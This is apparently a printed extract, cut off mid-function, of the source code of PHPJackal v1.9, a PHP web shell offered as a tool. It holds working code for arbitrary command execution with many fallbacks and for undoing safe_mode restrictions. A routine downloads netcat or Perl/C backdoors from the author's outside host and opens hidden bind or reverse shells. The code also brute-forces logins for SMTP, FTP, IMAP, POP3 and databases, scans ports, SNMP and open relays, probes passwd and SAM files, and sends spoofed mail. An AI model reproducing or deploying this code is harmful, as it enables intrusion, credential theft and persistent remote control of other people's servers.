Php Jackal

5/13/2018 Php Jackal

1/39


2/39

elseif(function_exists('socket_set_timeout')){$scan=fsockopen("udp://$ip",$port);if($scan){socket_set_timeout($scan,$timeout);fwrite($scan,"\x00");$s=time();fread($scan,1);

if((time()-$s)>=$timeout){fclose($scan);return 1;}}}return 0;}if(!function_exists('is_executable')){function is_executable($addr){return 0;}}if(!function_exists('file_get_contents')){function file_get_contents($addr){

$a=fopen($addr,'r');$tmp=fread($a,filesize($a));fclose($a);if($a)return $tmp;else return null;}}if(!function_exists('file_put_contents')){function file_put_contents($addr,$con){$a=fopen($addr,'w');if(!$a)return 0;$t=fwrite($a,$con);fclose($a);if($t)return strlen($con);

return 0;}}function file_add_contentS($addr,$con){$a=fopen($addr,'a');if(!$a)return 0;fwrite($a,$con);fclose($a);return strlen($con);}if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']);

if(!empty($_REQUEST['downloaD'])){ob_clean();$dl=$_REQUEST['downloaD'];$con=file_get_contents($dl);header('Content-type: application/octet-stream');header("Content-disposition: attachment; filename=\"$dl\";");header('Content-length: '.strlen($con));echo $con;exit;}if(!empty($_REQUEST['imagE'])){$img=$_REQUEST['imagE'];header('Content-type: imagE/gif');

header("Content-length: ".filesize($img));header("Last-Modified: ".date('r',filemtime($img)));echo file_get_contents($img);


3/39

exit;}if(!empty($_REQUEST['exT'])){$ex=$_REQUEST['exT'];$e=get_extension_funcs($ex);echo ''.htmlspecialchars($ex).'Functions:
';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disabl

efunctions))echo 'DISABLED';echo '
';}echo '';exit;}function showsizE($size){if($size>=1073741824)$size=round(($size/1073741824),2).' GB';elseif($size>=1048576)$size=round(($size/1048576),2).' MB';elseif($size>=1024)$size=round(($size/1024),2).' KB';else $size.=' B';return $size;}$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0;

$errorbox="Error: ";$v='1.9';$cwd=getcwd();$msgbox="
";$intro="Script:
".str_repeat('-=-',25)."
Name: PHPJackal
Version: $v

Author:
".str_repeat('-=-',25)."
Name: NetJackal
Country: Iran
Website: http://netjackal.by.ru/
Email: [email protected]
".str_repeat('-=-',25)."
Error: Enable JavaScript in your browser!!

!$et";$footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et";$hcwd="";$t="";$crack="Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";function checkfunctioN($func){global $disablefunctions,$safemode;$safe=array('passthru','system','exec','shell_exec','popen','proc_open');

if($safemode=='ON' && in_array($func,$safe))return 0;elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1;


4/39

return 0;}function whereistmP(){$uploadtmp=ini_get('upload_tmp_dir');$uf=getenv('USERPROFILE');$af=getenv('ALLUSERSPROFILE');$se=ini_get('session.save_path');

$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';if(is_dir($uf) && is_writable($uf))return $uf;if(is_dir($af) && is_writable($af))return $af;if(is_dir($se) && is_writable($se))return $se;if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;return '.';}function shelL($command){

global $windows;$exec=$output='';$dep[]=array('pipe','r');$dep[]=array('pipe','w');if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;}elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command);elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!f

eof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command);elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command);elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws);elseif(extension_loaded('perl'))$exec=perlshelL($command);return $exec;}function getiT($get){$fo=strtolower(ini_get('allow_url_fopen'));$ui=strtolower(ini_get('allow_url_include'));

if($fo $fo=='on')$con=file_get_contents($get);elseif($ui $ui=='on'){ob_start();include($get);$con=ob_get_contents();ob_end_clean();}else{$u=parse_url($get);$host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port'];$url=fsockopen($host,$port,$en,$es,12);fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nRefere

r: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");$tmp=$con='';


5/39

while($tmp!="\r\n")$tmp=fgets($url);while(!feof($url))$con.=fgets($url);}return $con;}function downloadiT($get,$put){$con=getiT($get);

$mk=file_put_contents($put,$con);if($mk)return 1;return 0;}function winshelL($command){$name=whereistmP()."\\".uniqid('NJ');win_shell_execute('cmd.exe','',"/C $command >\"$name\"");sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}

function ffishelL($command){$name=whereistmP()."\\".uniqid('NJ');$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function srvshelL($command){$name=whereistmP()."\\".uniqid('NJ');$n=uniqid('NJ');$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['Com

Spec'];win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));win32_start_service($n);win32_stop_service($n);win32_delete_service($n);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function comshelL($command,$ws){

$exec=$ws->exec("cmd.exe /c $command");$so=$exec->StdOut();return $so->ReadAll();}function perlshelL($command){$perl=new perl();ob_start();$perl->eval("system('$command')");$exec=ob_get_contents();ob_end_clean();return $exec;}function smtpchecK($addr,$user,$pass,$timeout){

$sock=fsockopen($addr,25,$n,$s,$timeout);if(!$sock)return -1;fread($sock,1024);


6/39

fputs($sock,'ehlo '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,1);if($res!='2')return 0;fgets($sock,512);fgets($sock,512);fgets($sock,512);fputs($sock,"AUTH LOGIN\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;

fputs($sock,base64_encode($user)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;fputs($sock,base64_encode($pass)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='235')return 0;return 1;}function mysqlchecK($host,$user,$pass,$timeout){if(function_exists('mysql_connect')){$l=mysql_connect($host,$user,$pass);if($l)return 1;

}return 0;}function mssqlchecK($host,$user,$pass,$timeout){if(function_exists('mssql_connect')){$l=mssql_connect($host,$user,$pass);if($l)return 1;}return 0;}function checksmtP($host,$timeout){$from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com';$sock=fsockopen($host,25,$n,$s,$timeout);

if(!$sock)return -1;$res=substr(fgets($sock,512),0,3);if($res!='220')return 0;fputs($sock,'HELO '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"MAIL FROM: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"RCPT TO: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;

fputs($sock,"DATA\r\n");$res=substr(fgets($sock,512),0,3);if($res!='354')return 0;fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." \r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;return 1;}function replace_stR($s,$h){$ret=$h;foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret);

return $ret;}function check_urL($url,$method,$search='200',$timeout=3){


7/39

$u=parse_url($url);$method=strtoupper($method);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$data=(!empty($u['query']))?$u['query']:'';if(!empty($data))$data="?$data";$sock=fsockopen($host,$port,$en,$es,$timeout);

if($sock){fputs($sock,"$method $file$data HTTP/1.0\r\n");fputs($sock,"Host: $host\r\n");if($method=='GET')fputs($sock,"\r\n");elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection:close\r\n\r\n$data");else return 0;if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;}while(!feof($sock)){$res=fgets($sock);

if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}}fclose($sock);}return 0;}function get_sw_namE($host,$timeout){$sock=fsockopen($host,80,$en,$es,$timeout);if($sock){$page=uniqid('NJ');fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");while(!feof($sock)){$con=fgets($sock);

if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}}fclose($sock);return -1;}return 0;}function snmpchecK($ip,$com,$timeout){$res=0;$n=chr(0x00);$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr

(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n;$sock=fsockopen("udp://$ip",161);if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout);fputs($sock,$packet);socket_set_timeout($sock,$timeout);$res=fgets($sock);fclose($sock);if($res != '')return 1;else return 0;}$safemode=(ini_get('safe_mode') strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF';if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');}

function brshelL(){global $errorbox,$windows,$et,$hcwd;$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;


8/39

$addr='http://netjackal.by.ru/br';$error="$errorbox Can not make backdoor file, go to writeable folder.$et";$n=uniqid('NJ_');if(!$windows)$n=".$n";$d=whereistmP();$name=$d.DIRECTORY_SEPARATOR.$n;$c=($_REQUEST['C'])?1:0;

if(!empty($_REQUEST['port']) && ($_REQUEST['port']=1)){$port=(int)$_REQUEST['port'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winbind.p",$name);

shelL("attrib +H $name");if(!$bd)echo $error;else shelL("perl $name $port");}}else{if($c){$bd=downloadiT("$addr/bind.c",$name);if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");}else{$bd=downloadiT("$addr/bind.p",$name);if(!$bd)echo $error;else shelL("cd $d;perl $n $port &");echo "Backdoor is waiting for you on $port.
";

}}}elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']=1) && !empty($_REQUEST['ip'])){$ip=$_REQUEST['ip'];$port=(int)$_REQUEST['rport'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");

if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winrc.p",$name);shelL("attrib +H $name");if (!$bd)echo $error;else shelL("perl.exe $name $ip $port");}}else{if($c){$bd=downloadiT("$addr/rc.c",$name);if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");

}else{$bd=downloadiT("$addr/rc.p",$name);if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &");


9/39

}}echo 'Done!';}else{echo "Bind shell:Port:

Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"$hcwd$etReverse shell:IP:Port:Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"$hcwd$et$et";}}function showimagE($img){echo "";}function editoR($file){global $errorbox,$et,$hcwd,$cwd;if(is_file($file)){if(!is_readable($file)){echo "$errorbox File is not readable$et
";}

if(!is_writeable($file)){echo "$errorbox File is not writeable$et
";}$data=file_get_contents($file);echo "$hcwd$et
";echo htmlspecialchars($data);echo "";

}else {echo "$hcwd$et
";}echo "$hcwd$et";}

function webshelL(){global $windows,$hcwd,$et,$cwd;if($windows){


10/39

$alias="Display open portsList of processesSystem informationIP configurationGet MAC addressServices listMachines in domainUserslistTurn off the server";}

else{$alias="Display open portsShow last 250 logged in usersDownloadersFind world-writable directoriesFind world-writable directories(in current directory)Find world-writable filesFind world-writable files(in current directory)Find files with SUID bit setFind files with SGID bit setFind .htpasswd filesFind .bash_history filesView syslog.confView hostsList of processes";if(is_dir('/etc/valiases'))$alias.="List ofcPanel`s domains(valiases)";if(is_dir('/etc/vdomainaliases'))$alias.="List cPanel`s domains(vdomainaliases)";if(file_exists('/var/cpanel/accounting.log'))$alias.="Display cPanel`s log";if(is_dir('/var/spool/mail/'))$alias.="Mailboxes list";}echo "Location:$et
Web Shell:";if(!empty($_REQUEST['cmd']))echo shelL($_REQUEST['cmd']);echo"$hcwd$alias$hcwd$et";

}function maileR(){global $msgbox,$et,$hcwd;if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];if(mail($to,$subject,$body,"From: $from"))echo "$msgboxMail sent!
$et";}echo "
Mailer:SMTP".ini_get('SMTP').' ('.ini_get('smtp_port').")From:$hcwdTo:


11/39

r='#666666'>Subject:Body:$et";

}function scanneR(){global $hcwd,$et;if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1';$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;if(($udp$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport'])&& !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){$target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0;echo 'Port scanning started against '.htmlspecialchars($target)

.':
';$start=time();for($i=$from;$i


12/39

if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port;$open=$ser='';foreach($p as $po){$scan=checkthisporT($ip,$po,$timeout);if($scan){$ser='';if($ser=getservbyport($po,'tcp'))$ser="($ser)";

$open.=" $po$ser ";}}if($open){echo "$ip) Open ports:$open
";$output=1;}

}if(!empty($_REQUEST['httpbanner'])){$res=get_sw_namE($ip,$timeout);if($res){echo "$ip) Webserver software: ";if($res==-1)echo 'Unknow';else echo $res;

echo '
';$output=1;}}if(!empty($_REQUEST['httpscanner'])){if(checkthisporT($ip,80,$timeout) && !empty($file)){$admin=array('/admin/','/adm/');$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgi

s/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');foreach($file as $v){$vuln=array();$v=trim($v);if(!$v $v{0}=='#')continue;$v=str_replace('","','^',$v);$v=str_replace('"','',$v);$vuln=explode('^',$v);$page=$cqich=$nukech=$adminch=$userch=$vuln[1];if(strstr($page,'@CGIDIRS'))foreach($cgi as $cg){$cqich=str_replace('@CGIDIRS',$cg,$page);

$url="http://$ip$cqich";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@ADMINDIRS'))foreach($admin as $cg){$adminch=str_replace('@ADMINDIRS',$cg,$page);$url="http://$ip$adminch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}

elseif(strstr($page,'@USERS'))foreach($users as $cg){$userch=str_replace('@USERS',$cg,$page);


13/39

$url="http://$ip$userch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@NUKE'))foreach($nuke as $cg){

$nukech=str_replace('@NUKE',$cg,$page);$url="http://$ip$nukech";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}else{$url="http://$ip$page";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}}

}}}if(!empty($_REQUEST['smtprelay'])){if(checkthisporT($ip,25,$timeout)){$res='';$res=checksmtP($ip,$timeout);if($res==1){echo "$ip) SMTP relay found.
";$output=1;}}}if(!empty($_REQUEST['snmpscanner'])){if(checkthisporT($ip,161,$timeout,1)){$com=$_REQUEST['com'];

$coms=$res='';if(strstr($com,','))$c=explode(',',$com);else $c[0]=$com;foreach($c as $v){$ret=snmpchecK($ip,$v,$timeout);if($ret)$coms.=" $v ";}if($coms!=''){echo "$ip) SNMP FOUND: $coms
";$output=1;}}}if(!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')){if(checkthisporT($ip,21,$timeout)){$usps=explode(',',$_REQUEST['userpass']);

foreach($usps as $v){$user=substr($v,0,strpos($v,':'));$pass=substr($v,strpos($v,':')+1);if($pass=='[BLANK]')$pass='';$ftp=ftp_connect($ip,21,$timeout);if($ftp){if(ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)." (Connect)
";}}}}

}if($output)echo '';}


14/39

$time=time()-$start;echo "Done! ($time seconds)";if(!empty($buglist))unlink($buglist);}elseif(!empty($_REQUEST['directoryscanner'])){$dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1'];echo "Scanning started...\n";

for($i=0;$i


15/39

bgcolor='#808080'>Get web bannerWebserver security scanningSMTP relay checkFTP password:SNMP:$et";}}function sysinfO(){global $windows,$disablefunctions,$cwd,$safemode;$t8="";$t6="";$mil="


16/39

$os=php_uname();$osn=php_uname('s');if(!$windows){$ker=php_uname('r');$o=($osn=='Linux')?'Linux+Kernel':$osn;$os=str_replace($osn,"${mil}$o'>$osn",$os);$os=str_replace($ker,"${mil}Linux+Kernel'>$ker",$os);

$inpa=':';}else{$sam=$sysroot."\\system32\\config\\SAM";$inpa=';';$os=str_replace($osn,"${mil}MS+Windows'>$osn",$os);}$cuser=get_current_user();if(!$cuser)$cuser='Unknow';$software=str_replace('Apache',"${mil}Apache'>Apache",$_SERVER['SERVER_SOFTWARE']);echo "Server information:${t6

}Server:".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "${t8}Operation system:$os$osver${t6}Web server application:$software${t8}CPU:$CPU${t6}Disk status:$disksize${t8}User domain:";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "${t6}User name:$cuser";if($windows){echo "${t8}Windows directory:$sysroot${t6}Sam file:";if(is_readable(($sam)))echo "Readable"; else echo 'Not readabl

e';echo '';}else{echo "${t8}UID - GID:".getmyuid().' - '.getmygid()."${t6}Recommended local root exploits:$xpl${t8}Passwd file:";if(is_readable('/etc/passwd'))echo "Readable";else echo'Not readable';echo "${t6}${mil}cpanel'>cPanel:";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: ";

if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "Readable";else echo 'Not readable';}else echo 'Not found';echo ')';}echo "$t8${mil}PHP'>PHP version:".PHP_VERSION." (more...)${t6}Zend version:";if (function_exists('zend_version')) echo "".zend_version().'';else echo 'Not Found';echo "${t8}Include path:".str_replace($inpa,'',DEFAULT_INCLUDE_PATH)."${t6}PHP Modules:";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i)

)$i="($i)";$l=hlinK("exT=$v");echo "$v $i ";}echo "${t8}Disabled functions:";if(!empty($ds))echo "$d


17/39

s ";else echo 'Nothing'; echo"${t6}Safe mode:$safemode${t8}Open base dir:$basedir${t6}DBMS:";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL ";if(function_exists('ora_logon')) $sq.=" ${mil}Oracle'>Oracle ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL ";if

(function_exists('msql_connect')) $sq.= ' mSQL ';if(function_exists('mysqli_connect'))$sq.= ' MySQLi ';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if ($sq=='') $sq= 'Nothing'; echo "$sq";}function checksuM($file){global $et;echo "MD5: ".md5_file($file).'
SHA1:'.sha1_file($file)."$et";}function listdiR($cwd,$task){$c=getcwd();

$dh=opendir($cwd);while($cont=readdir($dh)){if($cont=='.' $cont=='..')continue;$adr=$cwd.DIRECTORY_SEPARATOR.$cont;switch($task){case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break;case '1':if(is_writeable($adr)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '2':if(is_file($adr) && is_writeable($adr))echo "[$adr]\n";break;

case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break;case '4':if(is_file($adr))echo "[$adr]\n";break;case '5':if(is_dir($adr))echo "[$adr]\n";break;case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '7':if(strstr($cont,$_REQUEST['search']) (is_file($adr) && strstr(file_g

et_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;}}if(is_dir($adr))listdiR($adr,$task);}}if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}}if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}}function filemanageR(){global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd;$table="";$td1n="";$td2m="";


18/39

$td1i="";$td2i="";$tdnr="";$tdw="";if(!empty($_REQUEST['task'])){if(!empty($_REQUEST['search']))$_REQUEST['task']=7;if(!empty($_REQUEST['re']))$_REQUEST['task']=6;

echo '';listdiR($cwd,$_REQUEST['task']);echo '';}else{if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV']) !empty($_REQUEST['rN'])){if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV'])){$title='Destination';$ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];$dis=(!empty($_REQUEST['cP']))?'Copy':'Move';}else{$ad=$_REQUEST['rN'];

$title='New name';$dis='Rename';}if(!!empty($_REQUEST['deS'])){echo "$title:$td1n$td2m$hcwd$et";}else{if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']);else{copy($ad,$_REQUEST['deS']);

if(!empty($_REQUEST['mV']))unlink($ad);}}}if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else unlink($_REQUEST['deL']);}if(!empty($_FILES['uploadfile'])){move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);echo "$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']." Filesize: ".$_FILES['uploadfile']['size']. "$et
";}

$select="--------


19/39

decoration:none' href='#' onClick=\"HS('div');\">- ] Location:$et";$file=$dir=$link=array();if($dirhandle=opendir($cwd)){while($cont=readdir($dirhandle)){if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont;

elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont;else $link[]=$cont;}closedir($dirhandle);sort($file);sort($dir);sort($link);echo "NameOwnerModification timeLast changeInfoSizeActions";$i=0;foreach($dir as $dn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($dn));$mdate=date('Y/m/d H:i:s',filemtime($dn));$adate=date('Y/m/d H:i:s',fileatime($dn));$diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>OpenRenameRemove";

if($owner)$own="".$owner['name'].'';if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2;echo "";if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W'

;echo '';echo "$cl1------";echo $cl2.$diraction;echo '';}foreach($file as $fn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($fn));$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>OpenEditDownloadHex viewImageInclude


20/39

value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>ChecksumCopyMoveRemove";$mdate=date('Y/m/d H:i:s',filemtime($fn));$adate=date('Y/m/d H:i:s',fileatime($fn));if($owner)$own="".$owner['name'].'';$size=showsizE(filesize($fn));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2;echo "";if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_ex

ecutable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "";echo "$cl1$size";echo $cl2.$fileaction;echo '';}foreach($link as $ln){$own='Unknow';$i++;$owner=posix_getpwuid(fileowner($ln));$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>OpenEditDownloadHex viewImageIncludeChecksumCopyMoveRenameRemove";$mdate=date('Y/m/d H:i:s',filemtime($ln));$adate=date('Y/m/d H:i:s',fileatime($ln));if($owner)$own="".$owner['name'].'';echo '';

$size=showsizE(filesize($ln));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2;echo "";if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "${cl1}";echo "L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "";echo "$cl1$size";

echo $cl2.$linkaction;echo '';}


21/39

}$dc=count($dir)-2;if($dc==-2)$dc=0;$fc=count($file);$lc=count($link);$total=$dc+$fc+$lc;$min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size')

,'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).' MB';echo "$tableFind:Regular expressions $hcwd$hcwdDisplay files and directories in current folderFind writable files and directories in current folderFindwritable files in current folderFind writable directories in current folderDisplay all files in current folderDisplay all directories in current folder$et
Summery: Total: $total Directories: $dc Files: $fc Links: $lc$et$td1n$td2m$hcwd$td1n Note: Max allowed file size to upload on thisserver is $min$et$et";}}function imapchecK($host,$username,$password,$timeout){$sock=fsockopen($host,143,$n,$s,$timeout);$b=uniqid('NJ');$l=strlen($b);if(!$sock)return -1;fread($sock,1024);fputs($sock,"$b LOGIN $username $password\r\n");$res=fgets($sock,$l+4);

fclose($sock);if($res=="$b OK")return 1;else return 0;}function ftpchecK($host,$username,$password,$timeout){$ftp=ftp_connect($host,21,$timeout);if(!$ftp)return -1;$con=ftp_login($ftp,$username,$password);if($con)return 1;else return 0;}function pop3checK($server,$user,$pass,$timeout){$sock=fsockopen($server,110,$en,$es,$timeout);if(!$sock)return -1;fread($sock,1024);

